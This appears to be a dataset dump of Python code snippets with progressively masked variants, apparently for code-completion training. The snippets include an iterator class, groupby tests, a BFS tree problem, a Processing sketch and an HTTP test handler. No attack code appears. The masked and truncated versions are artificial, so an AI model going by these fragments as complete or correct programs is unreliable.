code
stringlengths 13
6.09M
| order_type
stringclasses 2
values | original_example
dict | step_ids
listlengths 1
5
|
---|---|---|---|
class Wspak:
<|reserved_special_token_0|>
def __init__(self, data):
self.data = data
self.index = -2
self.i = len(data) - 1
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Wspak:
"""Iterator zwracający wartości w odwróconym porządku"""
def __init__(self, data):
self.data = data
self.index = -2
self.i = len(data) - 1
def __iter__(self):
return self
def __next__(self):
if self.index >= self.i:
raise StopIteration
self.index = self.index + 2
return self.data[self.index]
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Wspak:
"""Iterator zwracający wartości w odwróconym porządku"""
def __init__(self, data):
self.data = data
self.index = -2
self.i = len(data) - 1
def __iter__(self):
return self
def __next__(self):
if self.index >= self.i:
raise StopIteration
self.index = self.index + 2
return self.data[self.index]
<|reserved_special_token_0|>
for x in Wspak(g):
print(x)
print(d)
<|reserved_special_token_1|>
class Wspak:
"""Iterator zwracający wartości w odwróconym porządku"""
def __init__(self, data):
self.data = data
self.index = -2
self.i = len(data) - 1
def __iter__(self):
return self
def __next__(self):
if self.index >= self.i:
raise StopIteration
self.index = self.index + 2
return self.data[self.index]
d = ['sdasda', 'sdasdasd', 'sdsad232', 'dasda', 'dsada']
g = 2, 3, 4, 6, 7
d = [x for x in Wspak(d)]
for x in Wspak(g):
print(x)
print(d)
<|reserved_special_token_1|>
class Wspak:
"""Iterator zwracający wartości w odwróconym porządku"""
def __init__(self, data):
self.data = data
self.index = -2
self.i=len(data)-1
def __iter__(self):
return self
def __next__(self):
if self.index >= self.i:
raise StopIteration
self.index = self.index+2
return self.data[self.index]
d=(["sdasda","sdasdasd","sdsad232","dasda","dsada"])
g=(2,3,4,6,7)
d = [x for x in Wspak(d)]
for x in Wspak(g):
print(x)
print(d)
|
flexible
|
{
"blob_id": "ea1d62c4a8c406dde9bb138ee045be5e682fdbfe",
"index": 566,
"step-1": "class Wspak:\n <mask token>\n\n def __init__(self, data):\n self.data = data\n self.index = -2\n self.i = len(data) - 1\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "class Wspak:\n \"\"\"Iterator zwracający wartości w odwróconym porządku\"\"\"\n\n def __init__(self, data):\n self.data = data\n self.index = -2\n self.i = len(data) - 1\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self.index >= self.i:\n raise StopIteration\n self.index = self.index + 2\n return self.data[self.index]\n\n\n<mask token>\n",
"step-3": "class Wspak:\n \"\"\"Iterator zwracający wartości w odwróconym porządku\"\"\"\n\n def __init__(self, data):\n self.data = data\n self.index = -2\n self.i = len(data) - 1\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self.index >= self.i:\n raise StopIteration\n self.index = self.index + 2\n return self.data[self.index]\n\n\n<mask token>\nfor x in Wspak(g):\n print(x)\nprint(d)\n",
"step-4": "class Wspak:\n \"\"\"Iterator zwracający wartości w odwróconym porządku\"\"\"\n\n def __init__(self, data):\n self.data = data\n self.index = -2\n self.i = len(data) - 1\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self.index >= self.i:\n raise StopIteration\n self.index = self.index + 2\n return self.data[self.index]\n\n\nd = ['sdasda', 'sdasdasd', 'sdsad232', 'dasda', 'dsada']\ng = 2, 3, 4, 6, 7\nd = [x for x in Wspak(d)]\nfor x in Wspak(g):\n print(x)\nprint(d)\n",
"step-5": "class Wspak:\n \"\"\"Iterator zwracający wartości w odwróconym porządku\"\"\"\n def __init__(self, data):\n self.data = data\n self.index = -2\n self.i=len(data)-1\n\n def __iter__(self):\n return self\n def __next__(self):\n if self.index >= self.i:\n raise StopIteration\n self.index = self.index+2\n return self.data[self.index]\nd=([\"sdasda\",\"sdasdasd\",\"sdsad232\",\"dasda\",\"dsada\"])\ng=(2,3,4,6,7)\nd = [x for x in Wspak(d)]\nfor x in Wspak(g):\n print(x)\nprint(d)",
"step-ids": [
2,
5,
6,
7,
8
]
}
|
[
2,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
class TestDictGroupBy(unittest.TestCase):
def setUp(self):
random.seed(0)
self.sut = dict_groupby
<|reserved_special_token_0|>
def generate_facility(self):
num_transactions = random.randint(1, 3)
transactions = {}
outstanding = 0
for i in range(num_transactions):
transactions[i] = self.generate_transaction()
outstanding += transactions[i]['outstanding']
return {'facility_type': random.choice(['a', 'b', 'c']),
'outstanding': outstanding, 'transactions': transactions}
<|reserved_special_token_0|>
def generate_record(self):
return {'gcol1': random.choice(['a', 'b', 'c']), 'gcol2': random.
choice(['a', 'b', 'c']), 'gcol3': random.choice(['a', 'b', 'c']
), 'vcol1': random.randint(0, 100), 'vcol2': random.random(),
'vcol3': random.randint(0, 2)}
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestDictGroupBy(unittest.TestCase):
def setUp(self):
random.seed(0)
self.sut = dict_groupby
<|reserved_special_token_0|>
def generate_facility(self):
num_transactions = random.randint(1, 3)
transactions = {}
outstanding = 0
for i in range(num_transactions):
transactions[i] = self.generate_transaction()
outstanding += transactions[i]['outstanding']
return {'facility_type': random.choice(['a', 'b', 'c']),
'outstanding': outstanding, 'transactions': transactions}
def generate_facilities(self, num):
out = {}
for i in range(num):
out[i] = self.generate_facility()
return out
def generate_record(self):
return {'gcol1': random.choice(['a', 'b', 'c']), 'gcol2': random.
choice(['a', 'b', 'c']), 'gcol3': random.choice(['a', 'b', 'c']
), 'vcol1': random.randint(0, 100), 'vcol2': random.random(),
'vcol3': random.randint(0, 2)}
def test_hierarchical_groupby(self):
input_set = self.generate_facilities(4)
group_columns = ['facility_type', {'transactions': 'transaction_type'}]
print(input_set)
self.sut.DictGroupBy(input_set, group_columns)
def test_groupby_and_sum_speed(self):
data = {}
for i in range(100000):
data[i] = self.generate_record()
print('Generated data.')
group_columns = ['gcol1', 'gcol2', 'gcol3']
t0 = time.time()
gb = dict_groupby.GroupByObj(data, group_columns)
t1 = time.time()
out = gb.sum()
tf = time.time()
print(t1 - t0, tf - t1, tf - t0)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestDictGroupBy(unittest.TestCase):
def setUp(self):
random.seed(0)
self.sut = dict_groupby
def generate_transaction(self):
return {'transaction_type': random.choice(['a', 'b', 'c']),
'outstanding': random.randint(0, 100)}
def generate_facility(self):
num_transactions = random.randint(1, 3)
transactions = {}
outstanding = 0
for i in range(num_transactions):
transactions[i] = self.generate_transaction()
outstanding += transactions[i]['outstanding']
return {'facility_type': random.choice(['a', 'b', 'c']),
'outstanding': outstanding, 'transactions': transactions}
def generate_facilities(self, num):
out = {}
for i in range(num):
out[i] = self.generate_facility()
return out
def generate_record(self):
return {'gcol1': random.choice(['a', 'b', 'c']), 'gcol2': random.
choice(['a', 'b', 'c']), 'gcol3': random.choice(['a', 'b', 'c']
), 'vcol1': random.randint(0, 100), 'vcol2': random.random(),
'vcol3': random.randint(0, 2)}
def test_hierarchical_groupby(self):
input_set = self.generate_facilities(4)
group_columns = ['facility_type', {'transactions': 'transaction_type'}]
print(input_set)
self.sut.DictGroupBy(input_set, group_columns)
def test_groupby_and_sum_speed(self):
data = {}
for i in range(100000):
data[i] = self.generate_record()
print('Generated data.')
group_columns = ['gcol1', 'gcol2', 'gcol3']
t0 = time.time()
gb = dict_groupby.GroupByObj(data, group_columns)
t1 = time.time()
out = gb.sum()
tf = time.time()
print(t1 - t0, tf - t1, tf - t0)
<|reserved_special_token_1|>
import random
import time
import unittest
from old import dict_groupby
class TestDictGroupBy(unittest.TestCase):
def setUp(self):
random.seed(0)
self.sut = dict_groupby
def generate_transaction(self):
return {'transaction_type': random.choice(['a', 'b', 'c']),
'outstanding': random.randint(0, 100)}
def generate_facility(self):
num_transactions = random.randint(1, 3)
transactions = {}
outstanding = 0
for i in range(num_transactions):
transactions[i] = self.generate_transaction()
outstanding += transactions[i]['outstanding']
return {'facility_type': random.choice(['a', 'b', 'c']),
'outstanding': outstanding, 'transactions': transactions}
def generate_facilities(self, num):
out = {}
for i in range(num):
out[i] = self.generate_facility()
return out
def generate_record(self):
return {'gcol1': random.choice(['a', 'b', 'c']), 'gcol2': random.
choice(['a', 'b', 'c']), 'gcol3': random.choice(['a', 'b', 'c']
), 'vcol1': random.randint(0, 100), 'vcol2': random.random(),
'vcol3': random.randint(0, 2)}
def test_hierarchical_groupby(self):
input_set = self.generate_facilities(4)
group_columns = ['facility_type', {'transactions': 'transaction_type'}]
print(input_set)
self.sut.DictGroupBy(input_set, group_columns)
def test_groupby_and_sum_speed(self):
data = {}
for i in range(100000):
data[i] = self.generate_record()
print('Generated data.')
group_columns = ['gcol1', 'gcol2', 'gcol3']
t0 = time.time()
gb = dict_groupby.GroupByObj(data, group_columns)
t1 = time.time()
out = gb.sum()
tf = time.time()
print(t1 - t0, tf - t1, tf - t0)
<|reserved_special_token_1|>
import random
import time
import unittest
from old import dict_groupby
class TestDictGroupBy(unittest.TestCase):
def setUp(self):
random.seed(0)
self.sut = dict_groupby
def generate_transaction(self):
return {
'transaction_type': random.choice(['a', 'b', 'c']),
'outstanding': random.randint(0, 100)
}
def generate_facility(self):
num_transactions = random.randint(1, 3)
transactions = {}
outstanding = 0
for i in range(num_transactions):
transactions[i] = self.generate_transaction()
outstanding += transactions[i]['outstanding']
return {
'facility_type': random.choice(['a', 'b', 'c']),
'outstanding': outstanding,
'transactions': transactions
}
def generate_facilities(self, num):
out = {}
for i in range(num):
out[i] = self.generate_facility()
return out
def generate_record(self):
return {
'gcol1': random.choice(['a', 'b', 'c']), 'gcol2': random.choice(['a', 'b', 'c']),
'gcol3': random.choice(['a', 'b', 'c']), 'vcol1': random.randint(0, 100), 'vcol2': random.random(),
'vcol3': random.randint(0, 2)
}
def test_hierarchical_groupby(self):
input_set = self.generate_facilities(4)
group_columns = ['facility_type', {'transactions': 'transaction_type'}]
print(input_set)
self.sut.DictGroupBy(input_set, group_columns)
def test_groupby_and_sum_speed(self):
data = {}
for i in range(100000):
data[i] = self.generate_record()
print('Generated data.')
group_columns = ['gcol1', 'gcol2', 'gcol3']
t0 = time.time()
gb = dict_groupby.GroupByObj(data, group_columns)
t1 = time.time()
out = gb.sum()
tf = time.time()
# print(out)
print(t1 - t0, tf - t1, tf - t0)
# df = pd.DataFrame(data).T
# t0 = time.time()
# df.groupby(group_columns).sum()
# tf = time.time()
# # print(out)
# print(tf - t0)
|
flexible
|
{
"blob_id": "f8e6f6e1be6c4ea306b7770c918b97808a0765b2",
"index": 6580,
"step-1": "<mask token>\n\n\nclass TestDictGroupBy(unittest.TestCase):\n\n def setUp(self):\n random.seed(0)\n self.sut = dict_groupby\n <mask token>\n\n def generate_facility(self):\n num_transactions = random.randint(1, 3)\n transactions = {}\n outstanding = 0\n for i in range(num_transactions):\n transactions[i] = self.generate_transaction()\n outstanding += transactions[i]['outstanding']\n return {'facility_type': random.choice(['a', 'b', 'c']),\n 'outstanding': outstanding, 'transactions': transactions}\n <mask token>\n\n def generate_record(self):\n return {'gcol1': random.choice(['a', 'b', 'c']), 'gcol2': random.\n choice(['a', 'b', 'c']), 'gcol3': random.choice(['a', 'b', 'c']\n ), 'vcol1': random.randint(0, 100), 'vcol2': random.random(),\n 'vcol3': random.randint(0, 2)}\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass TestDictGroupBy(unittest.TestCase):\n\n def setUp(self):\n random.seed(0)\n self.sut = dict_groupby\n <mask token>\n\n def generate_facility(self):\n num_transactions = random.randint(1, 3)\n transactions = {}\n outstanding = 0\n for i in range(num_transactions):\n transactions[i] = self.generate_transaction()\n outstanding += transactions[i]['outstanding']\n return {'facility_type': random.choice(['a', 'b', 'c']),\n 'outstanding': outstanding, 'transactions': transactions}\n\n def generate_facilities(self, num):\n out = {}\n for i in range(num):\n out[i] = self.generate_facility()\n return out\n\n def generate_record(self):\n return {'gcol1': random.choice(['a', 'b', 'c']), 'gcol2': random.\n choice(['a', 'b', 'c']), 'gcol3': random.choice(['a', 'b', 'c']\n ), 'vcol1': random.randint(0, 100), 'vcol2': random.random(),\n 'vcol3': random.randint(0, 2)}\n\n def test_hierarchical_groupby(self):\n input_set = self.generate_facilities(4)\n group_columns = ['facility_type', {'transactions': 'transaction_type'}]\n print(input_set)\n self.sut.DictGroupBy(input_set, group_columns)\n\n def test_groupby_and_sum_speed(self):\n data = {}\n for i in range(100000):\n data[i] = self.generate_record()\n print('Generated data.')\n group_columns = ['gcol1', 'gcol2', 'gcol3']\n t0 = time.time()\n gb = dict_groupby.GroupByObj(data, group_columns)\n t1 = time.time()\n out = gb.sum()\n tf = time.time()\n print(t1 - t0, tf - t1, tf - t0)\n",
"step-3": "<mask token>\n\n\nclass TestDictGroupBy(unittest.TestCase):\n\n def setUp(self):\n random.seed(0)\n self.sut = dict_groupby\n\n def generate_transaction(self):\n return {'transaction_type': random.choice(['a', 'b', 'c']),\n 'outstanding': random.randint(0, 100)}\n\n def generate_facility(self):\n num_transactions = random.randint(1, 3)\n transactions = {}\n outstanding = 0\n for i in range(num_transactions):\n transactions[i] = self.generate_transaction()\n outstanding += transactions[i]['outstanding']\n return {'facility_type': random.choice(['a', 'b', 'c']),\n 'outstanding': outstanding, 'transactions': transactions}\n\n def generate_facilities(self, num):\n out = {}\n for i in range(num):\n out[i] = self.generate_facility()\n return out\n\n def generate_record(self):\n return {'gcol1': random.choice(['a', 'b', 'c']), 'gcol2': random.\n choice(['a', 'b', 'c']), 'gcol3': random.choice(['a', 'b', 'c']\n ), 'vcol1': random.randint(0, 100), 'vcol2': random.random(),\n 'vcol3': random.randint(0, 2)}\n\n def test_hierarchical_groupby(self):\n input_set = self.generate_facilities(4)\n group_columns = ['facility_type', {'transactions': 'transaction_type'}]\n print(input_set)\n self.sut.DictGroupBy(input_set, group_columns)\n\n def test_groupby_and_sum_speed(self):\n data = {}\n for i in range(100000):\n data[i] = self.generate_record()\n print('Generated data.')\n group_columns = ['gcol1', 'gcol2', 'gcol3']\n t0 = time.time()\n gb = dict_groupby.GroupByObj(data, group_columns)\n t1 = time.time()\n out = gb.sum()\n tf = time.time()\n print(t1 - t0, tf - t1, tf - t0)\n",
"step-4": "import random\nimport time\nimport unittest\nfrom old import dict_groupby\n\n\nclass TestDictGroupBy(unittest.TestCase):\n\n def setUp(self):\n random.seed(0)\n self.sut = dict_groupby\n\n def generate_transaction(self):\n return {'transaction_type': random.choice(['a', 'b', 'c']),\n 'outstanding': random.randint(0, 100)}\n\n def generate_facility(self):\n num_transactions = random.randint(1, 3)\n transactions = {}\n outstanding = 0\n for i in range(num_transactions):\n transactions[i] = self.generate_transaction()\n outstanding += transactions[i]['outstanding']\n return {'facility_type': random.choice(['a', 'b', 'c']),\n 'outstanding': outstanding, 'transactions': transactions}\n\n def generate_facilities(self, num):\n out = {}\n for i in range(num):\n out[i] = self.generate_facility()\n return out\n\n def generate_record(self):\n return {'gcol1': random.choice(['a', 'b', 'c']), 'gcol2': random.\n choice(['a', 'b', 'c']), 'gcol3': random.choice(['a', 'b', 'c']\n ), 'vcol1': random.randint(0, 100), 'vcol2': random.random(),\n 'vcol3': random.randint(0, 2)}\n\n def test_hierarchical_groupby(self):\n input_set = self.generate_facilities(4)\n group_columns = ['facility_type', {'transactions': 'transaction_type'}]\n print(input_set)\n self.sut.DictGroupBy(input_set, group_columns)\n\n def test_groupby_and_sum_speed(self):\n data = {}\n for i in range(100000):\n data[i] = self.generate_record()\n print('Generated data.')\n group_columns = ['gcol1', 'gcol2', 'gcol3']\n t0 = time.time()\n gb = dict_groupby.GroupByObj(data, group_columns)\n t1 = time.time()\n out = gb.sum()\n tf = time.time()\n print(t1 - t0, tf - t1, tf - t0)\n",
"step-5": "import random\nimport time\nimport unittest\n\nfrom old import dict_groupby\n\n\nclass TestDictGroupBy(unittest.TestCase):\n\n def setUp(self):\n random.seed(0)\n self.sut = dict_groupby\n\n def generate_transaction(self):\n return {\n 'transaction_type': random.choice(['a', 'b', 'c']),\n 'outstanding': random.randint(0, 100)\n }\n\n def generate_facility(self):\n num_transactions = random.randint(1, 3)\n transactions = {}\n outstanding = 0\n for i in range(num_transactions):\n transactions[i] = self.generate_transaction()\n outstanding += transactions[i]['outstanding']\n\n return {\n 'facility_type': random.choice(['a', 'b', 'c']),\n 'outstanding': outstanding,\n 'transactions': transactions\n }\n\n def generate_facilities(self, num):\n out = {}\n for i in range(num):\n out[i] = self.generate_facility()\n return out\n\n def generate_record(self):\n return {\n 'gcol1': random.choice(['a', 'b', 'c']), 'gcol2': random.choice(['a', 'b', 'c']),\n 'gcol3': random.choice(['a', 'b', 'c']), 'vcol1': random.randint(0, 100), 'vcol2': random.random(),\n 'vcol3': random.randint(0, 2)\n }\n\n def test_hierarchical_groupby(self):\n input_set = self.generate_facilities(4)\n group_columns = ['facility_type', {'transactions': 'transaction_type'}]\n print(input_set)\n self.sut.DictGroupBy(input_set, group_columns)\n\n def test_groupby_and_sum_speed(self):\n data = {}\n for i in range(100000):\n data[i] = self.generate_record()\n print('Generated data.')\n group_columns = ['gcol1', 'gcol2', 'gcol3']\n\n t0 = time.time()\n gb = dict_groupby.GroupByObj(data, group_columns)\n t1 = time.time()\n out = gb.sum()\n tf = time.time()\n # print(out)\n print(t1 - t0, tf - t1, tf - t0)\n\n # df = pd.DataFrame(data).T\n # t0 = time.time()\n # df.groupby(group_columns).sum()\n # tf = time.time()\n # # print(out)\n # print(tf - t0)",
"step-ids": [
4,
7,
8,
9,
10
]
}
|
[
4,
7,
8,
9,
10
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class SimulatorInfo(object):
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class SimulatorInfo(object):
def __init__(self, name=None, device_type=None, sdk=None, device_id=
None, sim_id=None):
self.name = name
self.device_type = device_type
self.sdk = sdk
self.device_id = device_id
self.sim_id = sim_id
|
flexible
|
{
"blob_id": "9b94e8aed2b0be2771a38cf2d1cf391772f3a9f0",
"index": 6478,
"step-1": "<mask token>\n",
"step-2": "class SimulatorInfo(object):\n <mask token>\n",
"step-3": "class SimulatorInfo(object):\n\n def __init__(self, name=None, device_type=None, sdk=None, device_id=\n None, sim_id=None):\n self.name = name\n self.device_type = device_type\n self.sdk = sdk\n self.device_id = device_id\n self.sim_id = sim_id\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from collections import defaultdict, deque
N = int(input())
adj_list = defaultdict(list)
E = []
V_number = [None] * N
for _ in range(N - 1):
a, b = map(int, input().split())
E.append((a, b))
adj_list[a].append(b)
adj_list[b].append(a)
C = sorted(list(map(int, input().split())), reverse=True)
q = deque([1])
i = 0
while q:
v = q.popleft()
V_number[v - 1] = C[i]
i += 1
for u in adj_list[v]:
if V_number[u - 1] is None:
q.append(u)
print(sum(C[1:]))
print(*V_number)
|
normal
|
{
"blob_id": "b93f6c3192f8dd58b96dfdc6ea2b17e12cce34d0",
"index": 9752,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor _ in range(N - 1):\n a, b = map(int, input().split())\n E.append((a, b))\n adj_list[a].append(b)\n adj_list[b].append(a)\n<mask token>\nwhile q:\n v = q.popleft()\n V_number[v - 1] = C[i]\n i += 1\n for u in adj_list[v]:\n if V_number[u - 1] is None:\n q.append(u)\nprint(sum(C[1:]))\nprint(*V_number)\n",
"step-3": "<mask token>\nN = int(input())\nadj_list = defaultdict(list)\nE = []\nV_number = [None] * N\nfor _ in range(N - 1):\n a, b = map(int, input().split())\n E.append((a, b))\n adj_list[a].append(b)\n adj_list[b].append(a)\nC = sorted(list(map(int, input().split())), reverse=True)\nq = deque([1])\ni = 0\nwhile q:\n v = q.popleft()\n V_number[v - 1] = C[i]\n i += 1\n for u in adj_list[v]:\n if V_number[u - 1] is None:\n q.append(u)\nprint(sum(C[1:]))\nprint(*V_number)\n",
"step-4": "from collections import defaultdict, deque\nN = int(input())\nadj_list = defaultdict(list)\nE = []\nV_number = [None] * N\nfor _ in range(N - 1):\n a, b = map(int, input().split())\n E.append((a, b))\n adj_list[a].append(b)\n adj_list[b].append(a)\nC = sorted(list(map(int, input().split())), reverse=True)\nq = deque([1])\ni = 0\nwhile q:\n v = q.popleft()\n V_number[v - 1] = C[i]\n i += 1\n for u in adj_list[v]:\n if V_number[u - 1] is None:\n q.append(u)\nprint(sum(C[1:]))\nprint(*V_number)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# PDE:
# add_library('hype')
# processing.py:
from hype.core.util import H
from hype.core.interfaces import HCallback
from hype.extended.behavior import HOscillator
from hype.extended.drawable import HCanvas, HRect
from hype.extended.layout import HGridLayout
from hype.extended.util import HDrawablePool
from random import choice
rectRadius = 50
numSquares = 25
canvas = None
pool = None
color1 = 0x406B2B24 # #6B2B24
color2 = 0xc4831521 # #831521
def setup():
global canvas, pool
size(568, 568)
H.init(this).background(0xffE0DFE2) # #E0DFE2
smooth()
canvas = H.add(HCanvas()).autoClear(False).fade(5)
pool = HDrawablePool(numSquares)
pool.autoParent(canvas)\
.add(HRect()
.size(rectRadius * 2)
.noStroke())\
.layout(HGridLayout()
.startLoc(rectRadius * 2 - 20, rectRadius * 2 - 20)
.spacing(rectRadius * 2 + 1, rectRadius * 2 + 1)
.cols(5))\
.onCreate(Callback())\
.requestAll()
def draw():
H.drawStage()
class Callback(HCallback):
def __init__(self):
pass
@staticmethod
def run(drawable):
drawable.anchorAt(H.CENTER)\
.fill(choice([color1, color2]))
HOscillator()\
.target(drawable)\
.property(H.ROTATION)\
.range(-5, 5)\
.speed(1)\
.freq(4)\
.currentStep(pool.currentIndex() * random(2, 25))
|
normal
|
{
"blob_id": "b8a41c56a31acab0181ec364f76010ac12119074",
"index": 5489,
"step-1": "<mask token>\n\n\nclass Callback(HCallback):\n\n def __init__(self):\n pass\n\n @staticmethod\n def run(drawable):\n drawable.anchorAt(H.CENTER).fill(choice([color1, color2]))\n HOscillator().target(drawable).property(H.ROTATION).range(-5, 5).speed(\n 1).freq(4).currentStep(pool.currentIndex() * random(2, 25))\n",
"step-2": "<mask token>\n\n\ndef setup():\n global canvas, pool\n size(568, 568)\n H.init(this).background(4292927458)\n smooth()\n canvas = H.add(HCanvas()).autoClear(False).fade(5)\n pool = HDrawablePool(numSquares)\n pool.autoParent(canvas).add(HRect().size(rectRadius * 2).noStroke()\n ).layout(HGridLayout().startLoc(rectRadius * 2 - 20, rectRadius * 2 -\n 20).spacing(rectRadius * 2 + 1, rectRadius * 2 + 1).cols(5)).onCreate(\n Callback()).requestAll()\n\n\ndef draw():\n H.drawStage()\n\n\nclass Callback(HCallback):\n\n def __init__(self):\n pass\n\n @staticmethod\n def run(drawable):\n drawable.anchorAt(H.CENTER).fill(choice([color1, color2]))\n HOscillator().target(drawable).property(H.ROTATION).range(-5, 5).speed(\n 1).freq(4).currentStep(pool.currentIndex() * random(2, 25))\n",
"step-3": "<mask token>\nrectRadius = 50\nnumSquares = 25\ncanvas = None\npool = None\ncolor1 = 1080765220\ncolor2 = 3296924961\n\n\ndef setup():\n global canvas, pool\n size(568, 568)\n H.init(this).background(4292927458)\n smooth()\n canvas = H.add(HCanvas()).autoClear(False).fade(5)\n pool = HDrawablePool(numSquares)\n pool.autoParent(canvas).add(HRect().size(rectRadius * 2).noStroke()\n ).layout(HGridLayout().startLoc(rectRadius * 2 - 20, rectRadius * 2 -\n 20).spacing(rectRadius * 2 + 1, rectRadius * 2 + 1).cols(5)).onCreate(\n Callback()).requestAll()\n\n\ndef draw():\n H.drawStage()\n\n\nclass Callback(HCallback):\n\n def __init__(self):\n pass\n\n @staticmethod\n def run(drawable):\n drawable.anchorAt(H.CENTER).fill(choice([color1, color2]))\n HOscillator().target(drawable).property(H.ROTATION).range(-5, 5).speed(\n 1).freq(4).currentStep(pool.currentIndex() * random(2, 25))\n",
"step-4": "from hype.core.util import H\nfrom hype.core.interfaces import HCallback\nfrom hype.extended.behavior import HOscillator\nfrom hype.extended.drawable import HCanvas, HRect\nfrom hype.extended.layout import HGridLayout\nfrom hype.extended.util import HDrawablePool\nfrom random import choice\nrectRadius = 50\nnumSquares = 25\ncanvas = None\npool = None\ncolor1 = 1080765220\ncolor2 = 3296924961\n\n\ndef setup():\n global canvas, pool\n size(568, 568)\n H.init(this).background(4292927458)\n smooth()\n canvas = H.add(HCanvas()).autoClear(False).fade(5)\n pool = HDrawablePool(numSquares)\n pool.autoParent(canvas).add(HRect().size(rectRadius * 2).noStroke()\n ).layout(HGridLayout().startLoc(rectRadius * 2 - 20, rectRadius * 2 -\n 20).spacing(rectRadius * 2 + 1, rectRadius * 2 + 1).cols(5)).onCreate(\n Callback()).requestAll()\n\n\ndef draw():\n H.drawStage()\n\n\nclass Callback(HCallback):\n\n def __init__(self):\n pass\n\n @staticmethod\n def run(drawable):\n drawable.anchorAt(H.CENTER).fill(choice([color1, color2]))\n HOscillator().target(drawable).property(H.ROTATION).range(-5, 5).speed(\n 1).freq(4).currentStep(pool.currentIndex() * random(2, 25))\n",
"step-5": "# PDE:\n# add_library('hype')\n# processing.py:\nfrom hype.core.util import H\nfrom hype.core.interfaces import HCallback\nfrom hype.extended.behavior import HOscillator\nfrom hype.extended.drawable import HCanvas, HRect\nfrom hype.extended.layout import HGridLayout\nfrom hype.extended.util import HDrawablePool\n\nfrom random import choice\n\n\nrectRadius = 50\nnumSquares = 25\ncanvas = None\npool = None\ncolor1 = 0x406B2B24 # #6B2B24\ncolor2 = 0xc4831521 # #831521\n\n\ndef setup():\n global canvas, pool\n size(568, 568)\n H.init(this).background(0xffE0DFE2) # #E0DFE2\n smooth()\n canvas = H.add(HCanvas()).autoClear(False).fade(5)\n pool = HDrawablePool(numSquares)\n pool.autoParent(canvas)\\\n .add(HRect()\n .size(rectRadius * 2)\n .noStroke())\\\n .layout(HGridLayout()\n .startLoc(rectRadius * 2 - 20, rectRadius * 2 - 20)\n .spacing(rectRadius * 2 + 1, rectRadius * 2 + 1)\n .cols(5))\\\n .onCreate(Callback())\\\n .requestAll()\n\n\ndef draw():\n H.drawStage()\n\n\nclass Callback(HCallback):\n def __init__(self):\n pass\n\n @staticmethod\n def run(drawable):\n drawable.anchorAt(H.CENTER)\\\n .fill(choice([color1, color2]))\n HOscillator()\\\n .target(drawable)\\\n .property(H.ROTATION)\\\n .range(-5, 5)\\\n .speed(1)\\\n .freq(4)\\\n .currentStep(pool.currentIndex() * random(2, 25))\n",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def contador_notas(multiplo, numero):
if numero % multiplo == 0:
notas = numero / multiplo
return notas
else:
return -1
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def contador_notas(multiplo, numero):
if numero % multiplo == 0:
notas = numero / multiplo
return notas
else:
return -1
<|reserved_special_token_0|>
if resultado != -1:
print('{} nota(s) de R$ {}'.format(resultado, 100))
<|reserved_special_token_1|>
def contador_notas(multiplo, numero):
if numero % multiplo == 0:
notas = numero / multiplo
return notas
else:
return -1
entrada = int(input())
resultado = contador_notas(100, entrada)
if resultado != -1:
print('{} nota(s) de R$ {}'.format(resultado, 100))
<|reserved_special_token_1|>
def contador_notas(multiplo, numero):
if(numero % multiplo == 0):
notas = numero / multiplo
return notas
else:
return -1
entrada = int(input())
resultado = contador_notas(100, entrada)
if (resultado != -1):
print("{} nota(s) de R$ {}".format(resultado, 100))
|
flexible
|
{
"blob_id": "a5c19ad60ac6312631273858cebaae944a2008ec",
"index": 8876,
"step-1": "<mask token>\n",
"step-2": "def contador_notas(multiplo, numero):\n if numero % multiplo == 0:\n notas = numero / multiplo\n return notas\n else:\n return -1\n\n\n<mask token>\n",
"step-3": "def contador_notas(multiplo, numero):\n if numero % multiplo == 0:\n notas = numero / multiplo\n return notas\n else:\n return -1\n\n\n<mask token>\nif resultado != -1:\n print('{} nota(s) de R$ {}'.format(resultado, 100))\n",
"step-4": "def contador_notas(multiplo, numero):\n if numero % multiplo == 0:\n notas = numero / multiplo\n return notas\n else:\n return -1\n\n\nentrada = int(input())\nresultado = contador_notas(100, entrada)\nif resultado != -1:\n print('{} nota(s) de R$ {}'.format(resultado, 100))\n",
"step-5": "def contador_notas(multiplo, numero):\n if(numero % multiplo == 0):\n notas = numero / multiplo\n return notas\n else:\n return -1\n\n\nentrada = int(input())\nresultado = contador_notas(100, entrada)\nif (resultado != -1):\n print(\"{} nota(s) de R$ {}\".format(resultado, 100))",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class Handler(object):
<|reserved_special_token_0|>
def get_rsp_from_url(self, url, params=None, method='get', data=None):
logging.warning(
'when using method {}, header is:\n {} \n data is: \n{}.\n'.
format(method, self.coffee_session.headers, data))
rsp = None
if 'get' == method:
rsp = self.coffee_session.get(url, params=params, timeout=10)
elif 'put' == method:
rsp = self.coffee_session.put(url, data=json.dumps(data))
elif 'post' == method:
rsp = self.coffee_session.post(url, data=json.dumps(data))
elif 'delete' == method:
rsp = self.coffee_session.delete(url, data=json.dumps(data))
else:
assert 0, 'We only support get/post/put/delete for now!!!'
logging.warning(
"""
#####
get rsp from url:
{} is :
#####
{}
#####
text is:
{}
#####
"""
.format(url, repr(rsp), repr(rsp.text)))
return rsp
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def _check_partial_rsp(self, exp, ori):
"""
Check partial rsp but not the while rsp.
:param exp: expected rsp
:param ori: origin rsp
:return: None
"""
logging.warning(
'Start to check if expected_rsp: {} is part of origin_rsp: {}'.
format(exp, ori))
